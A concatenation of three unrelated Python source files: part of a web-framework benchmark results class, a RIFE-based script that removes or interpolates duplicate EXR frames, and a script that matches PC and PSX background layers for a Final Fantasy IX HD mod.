if test.name in self.verify.keys():
for test_type, result in self.verify[test.name].items():
if result.upper() == "PASS":
color = Fore.GREEN
elif result.upper() == "WARN":
color = Fore.YELLOW
else:
color = Fore.RED
log(Fore.CYAN + "| " + test_type.ljust(13) +
' : ' + color + result.upper())
else:
log(Fore.CYAN + "| " + Fore.RED +
"NO RESULTS (Did framework launch?)")
log('', border='=', border_bottom='', color=Fore.CYAN)
log("Results are saved in " + self.directory)
#############################################################################
# PRIVATE FUNCTIONS
#############################################################################
def __to_jsonable(self):
'''
Returns a dict suitable for jsonification
'''
toRet = dict()
toRet['uuid'] = self.uuid
toRet['name'] = self.name
toRet['environmentDescription'] = self.environmentDescription
toRet['git'] = self.git
toRet['startTime'] = self.startTime
toRet['completionTime'] = self.completionTime
toRet['concurrencyLevels'] = self.concurrencyLevels
toRet['pipelineConcurrencyLevels'] = self.pipelineConcurrencyLevels
toRet['queryIntervals'] = self.queryIntervals
toRet['cachedQueryIntervals'] = self.cachedQueryIntervals
toRet['frameworks'] = self.frameworks
toRet['duration'] = self.duration
toRet['rawData'] = self.rawData
toRet['completed'] = self.completed
toRet['succeeded'] = self.succeeded
toRet['failed'] = self.failed
toRet['verify'] = self.verify
toRet['testMetadata'] = self.benchmarker.metadata.to_jsonable()
return toRet
def __write_results(self):
try:
with open(self.file, 'w') as f:
f.write(json.dumps(self.__to_jsonable(), indent=2))
except IOError:
log("Error writing results.json")
def __count_sloc(self):
'''
Counts the significant lines of code for all tests and stores in results.
'''
frameworks = self.benchmarker.metadata.gather_frameworks(
self.config.test, self.config.exclude)
framework_to_count = {}
for framework, testlist in frameworks.items():
wd = testlist[0].directory
# Find the last instance of the word 'code' in the yaml output. This
# should be the line count for the sum of all listed files or just
# the line count for the last file in the case where there's only
# one file listed.
command = "cloc --yaml --follow-links . | grep code | tail -1 | cut -d: -f 2"
log("Running \"%s\" (cwd=%s)" % (command, wd))
try:
line_count = int(subprocess.check_output(command, cwd=wd, shell=True))
except (subprocess.CalledProcessError, ValueError) as e:
log("Unable to count lines of code for %s due to error '%s'" %
(framework, e))
continue
log("Counted %s lines of code" % line_count)
framework_to_count[framework] = line_count
self.rawData['slocCounts'] = framework_to_count
def __count_commits(self):
'''
Count the git commits for all the framework tests
'''
frameworks = self.benchmarker.metadata.gather_frameworks(
self.config.test, self.config.exclude)
def count_commit(directory, jsonResult):
command = "git rev-list HEAD -- " + directory + " | sort -u | wc -l"
try:
commitCount = subprocess.check_output(command, shell=True)
jsonResult[framework] = int(commitCount)
except subprocess.CalledProcessError:
pass
# Because git can be slow when run in large batches, this
# calls git up to 4 times in parallel. Normal improvement is ~3-4x
# in my trials, or ~100 seconds down to ~25
# This is safe to parallelize as long as each thread only
# accesses one key in the dictionary
threads = []
jsonResult = {}
# t1 = datetime.now()
for framework, testlist in frameworks.items():
directory = testlist[0].directory
t = threading.Thread(
target=count_commit, args=(directory, jsonResult))
t.start()
threads.append(t)
# Git has internal locks, full parallel will just cause contention
# and slowness, so we rate-limit a bit
if len(threads) >= 4:
threads[0].join()
threads.remove(threads[0])
# Wait for remaining threads
for t in threads:
t.join()
# t2 = datetime.now()
# print "Took %s seconds " % (t2 - t1).seconds
self.rawData['commitCounts'] = jsonResult
self.config.commits = jsonResult
def __get_git_commit_id(self):
'''
Get the git commit id for this benchmark
'''
return subprocess.check_output(
["git", "rev-parse", "HEAD"], cwd=self.config.fw_root).strip()
def __get_git_repository_url(self):
'''
Gets the git repository url for this benchmark
'''
return subprocess.check_output(
["git", "config", "--get", "remote.origin.url"],
cwd=self.config.fw_root).strip()
def __get_git_branch_name(self):
'''
Gets the git branch name for this benchmark
'''
return subprocess.check_output(
'git rev-parse --abbrev-ref HEAD',
shell=True,
cwd=self.config.fw_root).strip()
def __parse_stats(self, framework_test, test_type, start_time, end_time,
interval):
'''
For each test type, process all the statistics, and return a multi-layered
dictionary that has a structure as follows:
(timestamp)
| (main header) - group that the stat is in
| | (sub header) - title of the stat
| | | (stat) - the stat itself, usually a floating point number
'''
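# A minimal sketch of the returned structure (timestamps and dstat column names
# below are assumed examples, not actual data):
#   {1500000000.0: {"total cpu usage": {"usr": 1.2, "idl": 98.8},
#                   "memory usage": {"used": 1048576.0, "free": 2097152.0}},
#    1500000001.0: {...}}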
stats_dict = dict()
stats_file = self.get_stats_file(framework_test.name, test_type)
with open(stats_file) as stats:
# dstat doesn't output a completely compliant CSV file - we need to strip the header
for _ in range(4):
next(stats)
stats_reader = csv.reader(stats)
main_header = next(stats_reader)
sub_header = next(stats_reader)
time_row = sub_header.index("epoch")
int_counter = 0
for row in stats_reader:
time = float(row[time_row])
int_counter += 1
if time < start_time:
continue
elif time > end_time:
return stats_dict
if int_counter % interval != 0:
continue
row_dict = dict()
for nextheader in main_header:
if nextheader != "":
row_dict[nextheader] = dict()
header = ""
for item_num, column in enumerate(row):
if len(main_header[item_num]) != 0:
header = main_header[item_num]
# all the stats are numbers, so we want to make sure that they stay that way in json
row_dict[header][sub_header[item_num]] = float(column)
stats_dict[time] = row_dict
return stats_dict
def __calculate_average_stats(self, raw_stats):
'''
We have a large amount of raw data for the statistics that may be useful
for the stats nerds, but most people care about a couple of numbers. For
now, we're only going to supply:
* Average CPU
* Average Memory
* Total network use
* Total disk use
More may be added in the future. If they are, please update the above list.
Note: raw_stats is directly from the __parse_stats method.
Recall that this consists of a dictionary of timestamps, each of which
contain a dictionary of stat categories which contain a dictionary of stats
'''
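# A minimal sketch of the shape this method aims to return (header names and
# values are assumed examples; note that sizeof_fmt is applied even to the
# averaged CPU percentage):
#   {"total cpu usage": "45.0bytes",
#    "memory usage": "512.0MB",
#    "net/total": {"receive": "1.2GB", "send": "800.0MB"},
#    "dsk/total": {"read": "2.1GB", "write": "1.5GB"}}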
raw_stat_collection = dict()
for time_dict in raw_stats.values():
for main_header, sub_headers in time_dict.items():
item_to_append = None
if 'cpu' in main_header:
# We want to take the idl stat and subtract it from 100
# to get the time that the CPU is NOT idle.
item_to_append = 100.0 - sub_headers['idl']
elif main_header == 'memory usage':
item_to_append = sub_headers['used']
elif 'net' in main_header:
# Network stats have two parts - receive and send. We'll use a tuple of
# style (receive, send)
item_to_append = (sub_headers['recv'], sub_headers['send'])
elif 'dsk' in main_header or 'io' in main_header:
# Similar for network, except our tuple looks like (read, write)
item_to_append = (sub_headers['read'], sub_headers['writ'])
if item_to_append is not None:
if main_header not in raw_stat_collection:
raw_stat_collection[main_header] = list()
raw_stat_collection[main_header].append(item_to_append)
# Simple function to determine human readable size
# http://stackoverflow.com/questions/1094841/reusable-library-to-get-human-readable-version-of-file-size
def sizeof_fmt(num):
# We'll assume that any number we get is convertible to a float, just in case
num = float(num)
for x in ['bytes', 'KB', 'MB', 'GB']:
if 1024.0 > num > -1024.0:
return "%3.1f%s" % (num, x)
num /= 1024.0
return "%3.1f%s" % (num, 'TB')
# Now we have our raw stats in a readable format - we need to format it for display
# We need a floating point sum, so the built in sum doesn't cut it
display_stat_collection = dict()
for header, values in raw_stat_collection.items():
display_stat = None
if 'cpu' in header:
display_stat = sizeof_fmt(math.fsum(values) / len(values))
elif header == 'memory usage':
display_stat = sizeof_fmt(math.fsum(values) / len(values))
elif 'net' in header:
receive, send = zip(*values) # unzip
display_stat = {
'receive': sizeof_fmt(math.fsum(receive)),
'send': sizeof_fmt(math.fsum(send))
}
else: # if 'dsk' or 'io' in header:
read, write = zip(*values) # unzip
display_stat = {
'read': sizeof_fmt(math.fsum(read)),
'write': sizeof_fmt(math.fsum(write))
}
display_stat_collection[header] = display_stat
return display_stat_collection
|
inference_dpframes.py
|
import os
import sys
import cv2
import torch
import argparse
import numpy as np
from tqdm import tqdm
from torch.nn import functional as F
import warnings
import _thread
from queue import Queue, Empty
warnings.filterwarnings("ignore")
from pprint import pprint, pformat
import time
import psutil
import multiprocessing as mp
import inference_common
IOThreadsFlag = True
IOProcesses = []
cv2.setNumThreads(1)
# Exception handler
def exception_handler(exctype, value, tb):
import traceback
locks = os.path.join(os.path.abspath(os.path.dirname(__file__)), 'locks')
cmd = 'rm -f ' + locks + '/*'
os.system(cmd)
pprint ('%s in %s' % (value, exctype))
pprint(traceback.format_exception(exctype, value, tb))
sys.__excepthook__(exctype, value, tb)
input("Press Enter to continue...")
sys.excepthook = exception_handler
# ctrl+c handler
import signal
def signal_handler(sig, frame):
global IOThreadsFlag
IOThreadsFlag = False
time.sleep(0.1)
sys.exit(0)
signal.signal(signal.SIGINT, signal_handler)
def clear_write_buffer(args, write_buffer, input_duration, pbar=None):
global IOThreadsFlag
global IOProcesses
number_of_write_threads = 4
while IOThreadsFlag:
alive_processes = []
for process in IOProcesses:
if process.is_alive():
alive_processes.append(process)
else:
process.join(timeout=0)
IOProcesses = list(alive_processes)
item = write_buffer.get()
frame_number, image_data = item
if frame_number == -1:
IOThreadsFlag = False
break
path = os.path.join(os.path.abspath(args.output), '{:0>7d}.exr'.format(frame_number))
if len(IOProcesses) < number_of_write_threads:
try:
p = mp.Process(target=cv2.imwrite, args=(path, image_data[:, :, ::-1], [cv2.IMWRITE_EXR_TYPE, cv2.IMWRITE_EXR_TYPE_HALF], ))
p.start()
IOProcesses.append(p)
except:
try:
cv2.imwrite(path, image_data[:, :, ::-1], [cv2.IMWRITE_EXR_TYPE, cv2.IMWRITE_EXR_TYPE_HALF])
except Exception as e:
print('Error writing %s: %s' % (path, e))
else:
try:
cv2.imwrite(path, image_data[:, :, ::-1], [cv2.IMWRITE_EXR_TYPE, cv2.IMWRITE_EXR_TYPE_HALF])
except Exception as e:
print('Error writing %s: %s' % (path, e))
if pbar:
pbar.update(1)
def build_read_buffer(user_args, read_buffer, videogen):
global IOThreadsFlag
for frame in videogen:
frame_data = cv2.imread(os.path.join(user_args.input, frame), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
read_buffer.put(frame_data)
read_buffer.put(None)
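# Note on the interpolation search below (descriptive comment; the walk-through
# ratio of 0.25 is only an assumed example): make_inference_rational() produces a
# frame at an arbitrary time `ratio` in (0, 1) between I0 and I1 using only the
# model's midpoint interpolation. It bisects the [I0_ratio, I1_ratio] interval,
# interpolating the midpoint and keeping the half that contains `ratio`, until the
# midpoint is within rthreshold/2 of the requested ratio or maxcycles is reached.
# For example, ratio=0.25 is reached by interpolating 0.5 first and then the
# midpoint of 0.0 and 0.5.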
def make_inference_rational(model, I0, I1, ratio, rthreshold=0.02, maxcycles = 8, UHD=False, always_interp=False):
I0_ratio = 0.0
I1_ratio = 1.0
rational_m = torch.mean(I0) * ratio + torch.mean(I1) * (1 - ratio)
if not always_interp:
if ratio <= I0_ratio + rthreshold / 2:
return I0
if ratio >= I1_ratio - rthreshold / 2:
return I1
for inference_cycle in range(0, maxcycles):
middle = model.inference(I0, I1, UHD)
middle_ratio = ( I0_ratio + I1_ratio ) / 2
if not always_interp:
if ratio - (rthreshold / 2) <= middle_ratio <= ratio + (rthreshold / 2):
return middle #+ (rational_m - torch.mean(middle)).expand_as(middle)
if ratio > middle_ratio:
I0 = middle
I0_ratio = middle_ratio
else:
I1 = middle
I1_ratio = middle_ratio
return middle #+ (rational_m - torch.mean(middle)).expand_as(middle)
def make_inference_rational_cpu(model, I0, I1, ratio, frame_num, w, h, write_buffer, rthreshold=0.02, maxcycles = 8, UHD=False, always_interp=False):
device = torch.device("cpu")
torch.set_grad_enabled(False)
I0_ratio = 0.0
I1_ratio = 1.0
# rational_m = torch.mean(I0) * ratio + torch.mean(I1) * (1 - ratio)
if not always_interp:
if ratio <= I0_ratio + rthreshold / 2:
I0 = (((I0[0]).cpu().detach().numpy().transpose(1, 2, 0)))
write_buffer.put((frame_num, I0[:h, :w]))
return
if ratio >= I1_ratio - rthreshold / 2:
I1 = (((I1[0]).cpu().detach().numpy().transpose(1, 2, 0)))
write_buffer.put((frame_num, I1[:h, :w]))
return
for inference_cycle in range(0, maxcycles):
middle = model.inference(I0, I1, UHD)
middle_ratio = ( I0_ratio + I1_ratio ) / 2
if not always_interp:
if ratio - (rthreshold / 2) <= middle_ratio <= ratio + (rthreshold / 2):
# middle = middle + (rational_m - torch.mean(middle)).expand_as(middle)
middle = (((middle[0]).cpu().detach().numpy().transpose(1, 2, 0)))
write_buffer.put((frame_num, middle[:h, :w]))
return
if ratio > middle_ratio:
middle = middle.detach()
I0 = middle.to(device, non_blocking=True)
I0_ratio = middle_ratio
else:
middle = middle.detach()
I1 = middle.to(device, non_blocking=True)
I1_ratio = middle_ratio
# middle = middle + (rational_m - torch.mean(middle)).expand_as(middle)
middle = (((middle[0]).cpu().detach().numpy().transpose(1, 2, 0)))
write_buffer.put((frame_num, middle[:h, :w]))
return
if __name__ == '__main__':
start = time.time()
msg = 'Fill / Remove duplicate frames\n'
msg += 'detect duplicate frames and fill them in with interpolated frames instead\n'
msg += 'or just cut them out of resulting sequence'
parser = argparse.ArgumentParser(description=msg)
parser.add_argument('--input', dest='input', type=str, default=None, help='folder with input sequence')
parser.add_argument('--output', dest='output', type=str, default=None, help='folder to output sequence to')
parser.add_argument('--model', dest='model', type=str, default='./trained_models/default/v2.0.model')
parser.add_argument('--remove', dest='remove', action='store_true', help='remove duplicate frames')
parser.add_argument('--UHD', dest='UHD', action='store_true', help='flow size 1/4')
parser.add_argument('--cpu', dest='cpu', action='store_true', help='do not use GPU at all, process only on CPU')
args = parser.parse_args()
if (args.output is None or args.input is None):
parser.print_help()
sys.exit()
if args.remove:
print('Initializing duplicate frames removal...')
else:
print('Initializing duplicate frames interpolation...')
img_formats = ['.exr',]
files_list = []
for f in os.listdir(args.input):
name, ext = os.path.splitext(f)
if ext in img_formats:
files_list.append(f)
input_duration = len(files_list)
if input_duration < 3:
print('not enough input frames: %s given' % input_duration)
input("Press Enter to continue...")
sys.exit()
output_folder = os.path.abspath(args.output)
if not os.path.exists(output_folder):
os.makedirs(output_folder)
files_list.sort()
read_buffer = Queue(maxsize=444)
_thread.start_new_thread(build_read_buffer, (args, read_buffer, files_list))
if args.remove:
write_buffer = Queue(maxsize=mp.cpu_count() - 3)
_thread.start_new_thread(clear_write_buffer, (args, write_buffer, input_duration))
if torch.cuda.is_available() and not args.cpu:
device = torch.device("cuda")
torch.set_grad_enabled(False)
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
else:
device = torch.device("cpu")
torch.set_grad_enabled(False)
print('scanning for duplicate frames...')
pbar = tqdm(total=input_duration, desc='Total frames ', unit='frame')
pbar_dup = tqdm(total=input_duration, desc='Removed ', bar_format='{desc}: {n_fmt}/{total_fmt} |{bar}')
IPrevious = None
output_frame_num = 1
for file in files_list:
current_frame = read_buffer.get()
pbar.update(1) # type: ignore
ICurrent = torch.from_numpy(np.transpose(current_frame, (2,0,1))).to(device, non_blocking=True).unsqueeze(0)
if IPrevious is not None:
diff = (F.interpolate(ICurrent,scale_factor=0.5, mode='bicubic', align_corners=False)
- F.interpolate(IPrevious, scale_factor=0.5, mode='bicubic', align_corners=False)).abs()
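# Duplicate-frame test (descriptive comment): frames are compared on a
# half-resolution bicubic downsample, and a frame whose maximum absolute
# difference from the previously kept frame is below 2e-3 is treated as a
# duplicate and skipped.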
if diff.max() < 2e-3:
pbar_dup.update(1)
continue
write_buffer.put((output_frame_num, current_frame))
IPrevious = ICurrent
output_frame_num += 1
write_buffer.put((-1, -1))
while(IOThreadsFlag):
time.sleep(0.01)
pbar.close() # type: ignore
pbar_dup.close()
elif torch.cuda.is_available() and not args.cpu:
# Process on GPU
if 'v1.8.model' in args.model:
from model.RIFE_HD import Model # type: ignore
else:
from model.RIFE_HDv2 import Model # type: ignore
model = Model()
model.load_model(args.model, -1)
model.eval()
model.device()
print ('Trained model loaded: %s' % args.model)
first_image = cv2.imread(os.path.join(args.input, files_list[0]), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
h, w, _ = first_image.shape
ph = ((h - 1) // 64 + 1) * 64
pw = ((w - 1) // 64 + 1) * 64
padding = (0, pw - w, 0, ph - h)
device = torch.device("cuda")
torch.set_grad_enabled(False)
torch.backends.cudnn.enabled = True
torch.backends.cudnn.benchmark = True
pbar = tqdm(total=input_duration, desc='Total frames', unit='frame')
pbar_dup = tqdm(total=input_duration, desc='Interpolating', bar_format='{desc}: {n_fmt}/{total_fmt} |{bar}')
write_buffer = Queue(maxsize=mp.cpu_count() - 3)
_thread.start_new_thread(clear_write_buffer, (args, write_buffer, input_duration, pbar))
IPrevious = None
dframes = 0
output_frame_num = 1
for file in files_list:
current_frame = read_buffer.get()
ICurrent = torch.from_numpy(np.transpose(current_frame, (2,0,1))).to(device, non_blocking=True).unsqueeze(0)
if not args.remove:
ICurrent = F.pad(ICurrent, padding)
if IPrevious is not None:
diff = (F.interpolate(ICurrent,scale_factor=0.5, mode='bicubic', align_corners=False)
- F.interpolate(IPrevious, scale_factor=0.5, mode='bicubic', align_corners=False)).abs()
if diff.max() < 2e-3:
dframes += 1
continue
if dframes and not args.remove:
rstep = 1 / ( dframes + 1 )
ratio = rstep
for dframe in range(0, dframes):
mid = make_inference_rational(model, IPrevious, ICurrent, ratio, UHD = args.UHD)
mid = (((mid[0]).cpu().numpy().transpose(1, 2, 0)))
write_buffer.put((output_frame_num, mid[:h, :w]))
# pbar.update(1) # type: ignore
pbar_dup.update(1)
output_frame_num += 1
ratio += rstep
write_buffer.put((output_frame_num, current_frame))
# pbar.update(1) # type: ignore
IPrevious = ICurrent
output_frame_num += 1
dframes = 0
# send write loop exit code
write_buffer.put((-1, -1))
# the write loop sets IOThreadsFlag to False when it returns
while(IOThreadsFlag):
time.sleep(0.01)
# pbar.update(1)
pbar.close() # type: ignore
pbar_dup.close()
else:
# process on CPU
if 'v1.8.model' in args.model:
from model_cpu.RIFE_HD import Model # type: ignore
else:
from model_cpu.RIFE_HDv2 import Model # type: ignore
model = Model()
model.load_model(args.model, -1)
model.eval()
model.device()
print ('Trained model loaded: %s' % args.model)
first_image = cv2.imread(os.path.join(args.input, files_list[0]), cv2.IMREAD_COLOR | cv2.IMREAD_ANYDEPTH)[:, :, ::-1].copy()
h, w, _ = first_image.shape
ph = ((h - 1) // 64 + 1) * 64
pw = ((w - 1) // 64 + 1) * 64
padding = (0, pw - w, 0, ph - h)
device = torch.device("cpu")
torch.set_grad_enabled(False)
sim_workers, thread_ram = inference_common.safe_threads_number(h, w)
pbar = tqdm(total=input_duration, desc='Total frames', unit='frame')
pbar_dup = tqdm(total=input_duration, desc='Interpolating', bar_format='{desc}: {n_fmt}/{total_fmt} |{bar}')
write_buffer = mp.Queue(maxsize=mp.cpu_count() - 3)
_thread.start_new_thread(clear_write_buffer, (args, write_buffer, input_duration, pbar))
IPrevious = None
dframes = 0
output_frame_num = 1
active_workers = []
for file in files_list:
current_frame = read_buffer.get()
# pbar.update(1) # type: ignore
ICurrent = torch.from_numpy(np.transpose(current_frame, (2,0,1))).to(device, non_blocking=True).unsqueeze(0)
ICurrent = F.pad(ICurrent, padding)
if IPrevious is not None:
diff = (F.interpolate(ICurrent,scale_factor=0.5, mode='bicubic', align_corners=False)
- F.interpolate(IPrevious, scale_factor=0.5, mode='bicubic', align_corners=False)).abs()
if diff.max() < 2e-3:
dframes += 1
continue
if dframes:
rstep = 1 / ( dframes + 1 )
ratio = rstep
last_thread_time = time.time()
for dframe in range(dframes):
p = mp.Process(target=make_inference_rational_cpu, args=(model, IPrevious, ICurrent, ratio, output_frame_num, w, h, write_buffer), kwargs = {'UHD': args.UHD})
p.start()
active_workers.append(p)
if (time.time() - last_thread_time) < (thread_ram / 8):
if sim_workers > 1:
time.sleep(thread_ram/8)
while len(active_workers) >= sim_workers:
finished_workers = []
alive_workers = []
for worker in active_workers:
if not worker.is_alive():
finished_workers.append(worker)
else:
alive_workers.append(worker)
active_workers = list(alive_workers)
time.sleep(0.01)
last_thread_time = time.time()
# mid = (((ICurrent[0]).cpu().detach().numpy().transpose(1, 2, 0)))
# write_buffer.put((output_frame_num, mid[:h, :w]))
pbar_dup.update(1)
output_frame_num += 1
ratio += rstep
write_buffer.put((output_frame_num, current_frame))
IPrevious = ICurrent
output_frame_num += 1
dframes = 0
# wait for all active worker threads left to finish
for p in active_workers:
p.join()
# send write loop exit code
write_buffer.put((-1, -1))
# the write loop sets IOThreadsFlag to False when it returns
while(IOThreadsFlag):
time.sleep(0.01)
pbar.close() # type: ignore
pbar_dup.close()
for p in IOProcesses:
p.join(timeout=8)
for p in IOProcesses:
p.terminate()
p.join(timeout=0)
import hashlib
lockfile = os.path.join('locks', hashlib.sha1(output_folder.encode()).hexdigest().upper() + '.lock')
if os.path.isfile(lockfile):
os.remove(lockfile)
# input("Press Enter to continue...")
sys.exit(0)
|
1-match_pc_psx.py
|
import os
import glob
import cv2
import shutil
import json
from multiprocessing import Process, Pool, Manager
import numpy as np
dir_path = os.path.dirname(os.path.realpath(__file__))
# Number of threads to use
NUM_THREADS = 12
# directory where the TIFF files for the PC background are located.
PC_FOLDER = os.path.join(dir_path, "PC_Extracted_Fields_Background")
# directory where the TIFF files for the PSX background are located.
PSX_FOLDER = os.path.join(dir_path, "PSX_Extracted_Fields_Background")
PSX_INFO_LIST = sorted(glob.glob(PSX_FOLDER+"\\CD_*\\*.info"))
PC_INFO_LIST = sorted(glob.glob(PC_FOLDER+"\\*.info"))
pc_infos = dict()
file_matching = dict()
FileCheck = False
def extract_pc_infos(pc_info):
tmp_pc_infos = dict()
with open(pc_info) as f:
tile_PC = int(f.readline())
info_PC = f.readlines()
if not tile_PC in tmp_pc_infos:
tmp_pc_infos[tile_PC] = dict()
for i in range(0, len(info_PC)):
layer = dict()
infos_layer = info_PC[i].strip().split(" ")
layer_blend = int(infos_layer[7])
layer_number = infos_layer[0]
layer_camera = int(infos_layer[1])
layer["layer_number"] = int(layer_number)
layer["layer_id"] = int(infos_layer[2])
layer["camera_id"] = int(layer_camera)
layer["blend"] = int(layer_blend)
layer["tile_amount"] = int(infos_layer[3])
layer["distance"] = int(infos_layer[4])
layer["has_parallax"] = int(infos_layer[5])
layer["is_static"] = int(infos_layer[6])
layer["is_attached"] = int(infos_layer[8])
layer["is_first_of_anim"] = int(infos_layer[9])
layer["is_looping"] = int(infos_layer[10])
if not layer_camera in tmp_pc_infos[tile_PC]:
tmp_pc_infos[tile_PC][layer_camera] = dict()
tmp_pc_infos[tile_PC][layer_camera]["layers"] =[]
img_PC_source = pc_info.replace(".info", "")
tmp_pc_infos[tile_PC][layer_camera]["img"] = img_PC_source
img_pc = cv2.imread(filename = img_PC_source, flags = cv2.IMREAD_UNCHANGED )
tmp_pc_infos[tile_PC][layer_camera]["width"] = img_pc.shape[0]
tmp_pc_infos[tile_PC][layer_camera]["height"] = img_pc.shape[1]
tmp_pc_infos[tile_PC][layer_camera]["size"] = os.path.getsize(img_PC_source)
tmp_pc_infos[tile_PC][layer_camera]["layers"].append(layer)
return tmp_pc_infos
def match_PC_PSX(pc_info_files):
for info_file in pc_info_files:
pass
def check_duplicate(img_duplicates):
key, value = img_duplicates
dups = {}
if len(value["duplicate"]) != 0 :
tile_PC = value["field"]
debug = False
if value["img"] == r"D:\FFIX_HD_MOD\PC_Extracted_Fields_Background\PC_16_4.tiff":
print("Debug", value["img"])
debug = True
# we are reading all the layers
ret, layers_PC = cv2.imreadmulti(filename = value["img"], flags = cv2.IMREAD_UNCHANGED )
for dup in value["duplicate"]:
# And all the layers of potential duplicates
sameFile = True
ret, layers_dup_PC = cv2.imreadmulti(filename = dup, flags = cv2.IMREAD_UNCHANGED )
# for some reasons, black images are messing with cv2....
if len(layers_PC) == 1:
layer_r, layer_g, layer_b, layer_a = cv2.split(layers_PC[0])
if cv2.countNonZero(layer_b) == 0 or cv2.countNonZero(layer_g) == 0 or cv2.countNonZero(layer_r) == 0:
sameFile = False
layer_r, layer_g, layer_b, layer_a = cv2.split(layers_dup_PC[0])
if cv2.countNonZero(layer_b) == 0 or cv2.countNonZero(layer_g) == 0 or cv2.countNonZero(layer_r) == 0:
sameFile = False
if sameFile == True:
for i in range(0, len(layers_PC)):
difference = cv2.subtract(layers_PC[i], layers_dup_PC[i])
r, g, b, a = cv2.split(difference)
# If layer A - layer B = 0, there is absolutely no difference in that layer.
# If there is a difference, it's not the same file, no need to check further !
if cv2.countNonZero(b) != 0 or cv2.countNonZero(g) != 0 or cv2.countNonZero(r) != 0:
sameFile = False
break
if sameFile == True:
if not value["img"] in dups :
dups[value["img"]] = []
dups[value["img"]].append(dup)
else :
# we know that this layer is not the same as our key, but it can be identical to any other layer!
# We do the same test - Should be a function to avoid duplicating code, but I'm lazy.
# Feel free to make it nicer :)
for other_dup in value["duplicate"]:
if other_dup != dup and other_dup not in dups.keys():
for current_dups in dups :
if other_dup in dups[current_dups]:
continue
other_sameFile = True
ret, other_layer_dup_PC = cv2.imreadmulti(filename = other_dup, flags = cv2.IMREAD_UNCHANGED )
if len(other_layer_dup_PC) == 1:
layer_r, layer_g, layer_b, layer_a = cv2.split(other_layer_dup_PC[0])
if cv2.countNonZero(layer_b) == 0 or cv2.countNonZero(layer_g) == 0 or cv2.countNonZero(layer_r) == 0:
other_sameFile = False
layer_r, layer_g, layer_b, layer_a = cv2.split(layers_dup_PC[0])
if cv2.countNonZero(layer_b) == 0 or cv2.countNonZero(layer_g) == 0 or cv2.countNonZero(layer_r) == 0:
other_sameFile = False
if other_sameFile == True:
for i in range(0, len(layers_dup_PC)):
difference = cv2.subtract(layers_dup_PC[i], other_layer_dup_PC[i])
b, g, r, a = cv2.split(difference)
if cv2.countNonZero(b) != 0 or cv2.countNonZero(g) != 0 or cv2.countNonZero(r) != 0:
other_sameFile = False
break
if other_sameFile == True:
if not dup in dups :
dups[dup] = []
dups[dup].append(other_dup)
return dups
def check_duplicate_main(orig_info_list, save_json):
pool = Pool(NUM_THREADS)
pc_infos = dict()
tmp_result = pool.map(extract_pc_infos, orig_info_list)
for result in tmp_result:
for tile_PC in result:
if not tile_PC in pc_infos:
pc_infos[tile_PC] = result[tile_PC]
else:
for camera in result[tile_PC]:
if not camera in pc_infos[tile_PC]:
pc_infos[tile_PC][camera] = result[tile_PC][camera]
else:
pass
# search for duplicate fields.
i = 0
img_duplicates = dict()
# Simple check here: if the file sizes are equal and they have the same number of layers, the files are potential duplicates.
for tile_PC in pc_infos:
tile_info = pc_infos[tile_PC]
for camera in tile_info:
camera_info = tile_info[camera]
img = camera_info["img"]
size_img = camera_info["size"]
width, height = (camera_info["width"], camera_info["height"])
key = ("%i_%i_%i_%i" %(size_img, width, height, len(camera_info["layers"])))
if not key in img_duplicates:
img_duplicates[key] = dict()
img_duplicates[key]["field"] = tile_PC
img_duplicates[key]["img"] = img
img_duplicates[key]["duplicate"] = []
else:
img_duplicates[key]["duplicate"].append(img)
i = i + 1
with open("Unique_Fields_PC_Unfiltered.json", "w") as write_file:
json.dump(pc_infos, write_file, indent=4)
print("Before filtering", len(pc_infos))
# More complicated check
dups = pool.map(check_duplicate, img_duplicates.items())
with open("Duplicated_PC_Images.json", "w") as write_file:
json.dump(dups, write_file, indent=4)
for dup in dups:
if len(dup) != 0:
for original in dup:
duplicates = dup[original]
for duplicate in duplicates:
tilesToDelete = []
for tile_PC in pc_infos:
camerasToDelete = []
tile_info = pc_infos[tile_PC]
for camera in tile_info:
camera_info = tile_info[camera]
if duplicate == camera_info["img"] :
camerasToDelete.append(camera)
for cameraToDelete in camerasToDelete:
if pc_infos[tile_PC].pop(cameraToDelete, None) is None:
print("Error")
else:
if len(pc_infos[tile_PC]) == 0:
tilesToDelete.append(tile_PC)
for tileToDelete in tilesToDelete:
if pc_infos.pop(tileToDelete, None) is None:
print("Error")
print("After filtering", len(pc_infos))
with open(save_json, "w") as write_file:
json.dump(pc_infos, write_file, indent=4)
return pc_infos
def match_psx_pc(fields, pc_infos, psx_infos, return_dict):
for field in fields:
field_info = pc_infos[field]
cam_result = dict()
if len(field_info) == 0:
print("No camera for field", field)
for camera in field_info:
camera_info = field_info[camera]
layers = camera_info["layers"]
img_pc = camera_info["img"]
num_layers = len(layers)
potential_matchs = []
num_no_text_layers = 0
for layer in layers:
if layer["is_static"] and layer["distance"] < 5:
break
# special case, manual correction.
if field == "1201" and layer["layer_number"] == 26:
break
num_no_text_layers = num_no_text_layers + 1
for psx_field in psx_infos:
psx_field_info = psx_infos[psx_field]
if not camera in psx_field_info:
continue
psx_camera_info = psx_field_info[camera]
psx_layers = psx_camera_info["layers"]
img_psx = psx_camera_info["img"]
psx_num_layers = len(psx_layers)
if psx_num_layers < num_no_text_layers:
# not worth investigating this.
continue
num_match = 0
for psx_layer in psx_layers:
for layer in layers:
if layer["is_static"] and layer["distance"] < 5:
continue
if (
psx_layer["layer_id"] == layer["layer_id"] and
psx_layer["camera_id"] == layer["camera_id"] and
psx_layer["blend"] == layer["blend"] and
psx_layer["tile_amount"] == layer["tile_amount"] and
psx_layer["distance"] == layer["distance"] and
psx_layer["has_parallax"] == layer["has_parallax"] and
psx_layer["is_static"] == layer["is_static"] and
psx_layer["is_attached"] == layer["is_attached"] and
psx_layer["is_first_of_anim"] == layer["is_first_of_anim"] and
psx_layer["is_looping"] == layer["is_looping"]
) :
num_match = num_match + 1
if num_match >= num_no_text_layers:
potential_matchs.append(psx_field)
if len(potential_matchs) == 0:
print("No match found for", img_pc, "camera", camera )
if len(potential_matchs) > 1:
if(os.path.exists(img_pc) == False):
print("Path", img_pc, "is not found")
ret, layers_PC = cv2.imreadmulti(filename = img_pc, flags = cv2.IMREAD_UNCHANGED )
betterField = - 1
minMean = 10000000000000000000
for potential_field in potential_matchs:
meanImg = 0
if(os.path.exists(psx_infos[potential_field][camera]["img"]) == False):
print("Path", psx_infos[potential_field][camera]["img"], "is not found")
